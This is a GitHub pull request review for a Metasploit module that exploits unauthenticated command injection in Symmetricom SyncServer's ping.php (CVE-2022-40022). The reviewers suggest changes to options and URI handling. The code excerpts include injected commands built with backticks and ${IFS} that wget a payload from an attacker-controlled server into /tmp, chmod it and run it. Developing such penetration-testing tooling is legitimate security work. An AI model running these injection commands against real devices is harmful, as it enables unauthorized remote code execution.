New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Added symmetricom_syncserver_rce.rb #18077
Conversation
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hey @sdcampbell, thank you for the module! I mostly suggested changes to metadata and some nice-to-have items, but I understand you no longer have access to a vulnerable target.
include Msf::Exploit::EXE | ||
include Msf::Exploit::Remote::HttpClient | ||
include Msf::Exploit::Remote::HttpServer::HTML |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Adding AutoCheck
gives the user the ability to automatically run the check
method when exploiting
include Msf::Exploit::EXE | |
include Msf::Exploit::Remote::HttpClient | |
include Msf::Exploit::Remote::HttpServer::HTML | |
include Msf::Exploit::EXE | |
include Msf::Exploit::Remote::HttpClient | |
include Msf::Exploit::Remote::HttpServer::HTML | |
prepend Msf::Exploit::Remote::AutoCheck |
register_options( | ||
[ | ||
OptString.new('FILENAME', [true, 'Payload filename', 'payload.elf']), | ||
OptAddress.new('SRVHOST', [true, 'HTTP Server Bind Address', '127.0.1.1']), | ||
OptInt.new('SRVPORT', [true, 'HTTP Server Port', '4444']) | ||
], self.class) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I suggest adding the TARGETURI
option in case the base path to the target is different for users of the module. With this option, you can use normalize_uri()
to build the request uri.
register_options( | |
[ | |
OptString.new('FILENAME', [true, 'Payload filename', 'payload.elf']), | |
OptAddress.new('SRVHOST', [true, 'HTTP Server Bind Address', '127.0.1.1']), | |
OptInt.new('SRVPORT', [true, 'HTTP Server Port', '4444']) | |
], self.class) | |
register_options( | |
[ | |
OptString.new('FILENAME', [true, 'Payload filename', 'payload.elf']), | |
OptAddress.new('SRVHOST', [true, 'HTTP Server Bind Address', '127.0.1.1']), | |
OptInt.new('SRVPORT', [true, 'HTTP Server Port', '4444']), | |
OptString.new('TARGETURI', [ true, 'Base path to Symmetricom SyncServer', '/' ]) | |
]) |
end | ||
|
||
def check | ||
uri = '/controller/ping.php' |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
uri = '/controller/ping.php' | |
uri = normalize_uri(target_uri.path, '/controller/ping.php') |
end | ||
|
||
def request(cmd) | ||
uri = "/controller/ping.php" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
uri = "/controller/ping.php" | |
uri = normalize_uri(target_uri.path, '/controller/ping.php') |
resource_uri="/"+filename | ||
shell_path = "/tmp/" | ||
cmds=["\`wget${IFS}http://"+srvhost+"/"+filename+"${IFS}-O${IFS}"+shell_path+filename+"\`", | ||
"\`chmod${IFS}700${IFS}"+shell_path+filename+"\`", | ||
"\`"+shell_path+filename+"\`"] | ||
start_service({'Uri' => { | ||
'Proc' => Proc.new { |cli, req| | ||
on_request_uri(cli, req)}, | ||
'Path' => resource_uri | ||
}}) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This looks like a good use case for fetch payloads or a command stager, but I understand that may not be feasible since we can't test it.
Updated heading Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Fixed misspelling Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Added CVE Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Added link to CVE Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
I added the module documentation and accepted some of the proposed module code changes. Other suggestions which may affect the module working were not implemented simply because I no longer have access to the vulnerable system to test. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Added two commits which add the documentation and module output. Also includes formatting changes from Rubocop and some updates to the metadata. I just have one question about the srvport
line. Didn't want to change that before verifying. Thanks!
Updated info to add allowed SRVPORT and LPORT, and fixed issue with srvport variable not used.
I fixed the issue with the srvport variable not used. |
Thanks, verified the pcap. Will get this landed soon! |
Release NotesThis adds an exploit for Symmetricom SyncServer appliances (S100-S300 series) vulnerable to an unauthenticated command injection in the |
This change adds symmetricom_syncserver_rce.rb to modules/exploits/linux/http.
Verification
List the steps needed to make sure this thing works
msfconsole
use exploit/linux/http/symmetricom_syncserver_rce
This module exploits an unauthenticated command injection vulnerability in /controller/ping.php. The S100 through S350 (End of Life) models should be vulnerable to unauthenticated exploitation due to a session handling vulnerability. Later models require authentication which is not provided in this module because we can't test it. The command injection vulnerability is patched in the S650 v2.2 (CVE-2022-40022).
I have a packet capture and the output from HttpTrace which I will send to your email address.